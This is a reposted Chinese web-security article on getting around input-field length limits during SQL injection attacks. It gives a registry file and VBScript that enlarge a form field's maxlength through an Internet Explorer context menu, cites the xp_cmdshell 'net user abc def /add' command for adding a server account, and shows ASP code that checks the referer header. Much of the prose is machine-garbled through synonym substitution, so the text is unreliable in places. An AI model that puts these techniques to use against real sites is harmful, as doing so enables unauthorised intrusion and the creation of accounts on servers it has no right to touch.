当前位置：首页 -> 网络安全 -> 网络其他 -> 突破SQL注入攻击时输入框长度的限制

突破SQL注入攻击时输入框长度的限制

时间： 2021-07-31 作者：daque

突破SQL注入攻击时输入框长度的限制前天tk接洽的一个网页改cookie的小玩意儿给我了一点点灵感昨晚又和adam聊了聊sql注入,今早晨来就写了这篇东东.xp_cmdshell net user abc def /add那些吩咐大师想必都用烂了吧,然而在本质的尝试中咱们往往会遇到如许的情景,效劳器的asp剧本没有对用户的输出做控制,然而在网页上经过对输出框树立maxlength属性使咱们的很多报复就不许举行.有些人大概会想到把网页考到当地,而后当地提交然而有一个题目是有的网站经过大略的比拟http_referer和server_name的值就不妨提防.好了很多人没方法了吧,除去写socket步调变换http_referer再有一个更大略的方法. ------------len.reg----------------- windows registry editor version 5.00[hkey_current_user\software\microsoft\internet explorer\menuext\扩充(&e)]@="c:\\documents and settings\\administrator\\桌面\\len.htm""contexts"=dword:00000004-----------end---------------------------------len.htm------------------<script language=vbs>set srcevent = external.menuarguments.eventset doc=external.menuarguments.documentset ele=doc.elementfrompoint( srcevent.clientx, srcevent.clienty )if ele.type ="text" or ele.type="password" thenele.maxlength=200ele.size=200end if</script>----------end-----------------------用法:先把len.reg导出备案表(提防文献路途)而后把len.htm拷到备案表中指定的场合.翻开网页,光标放在要变换长度的输出框上点右键,看多了一个叫扩充的选项了吧单击搞定!跋文:同样的也就不妨周旋那些控制输出实质的剧本了.附:提防当地提交的asp代码.<%server_v1=cstr(request.servervariables("http_referer"))server_v2=cstr(request.servervariables("server_name"))if mid(server_v1,8,len(server_v2))<>server_v2 thenresponse.write "<br><br><center><table border=1 cellpadding=20 bordercolor=black bgcolor=#eeeeee width=450>"response.write "<tr><td style=font:9pt verdana>"response.write "你提交的路途有误，遏止从站点外部提交数据请不要乱该参数！"response.write "</td></tr></table></center>"response.endend if%>

突破SQL注入攻击时输入框长度的限制

相关推荐

推荐下载

热门阅览

最新排行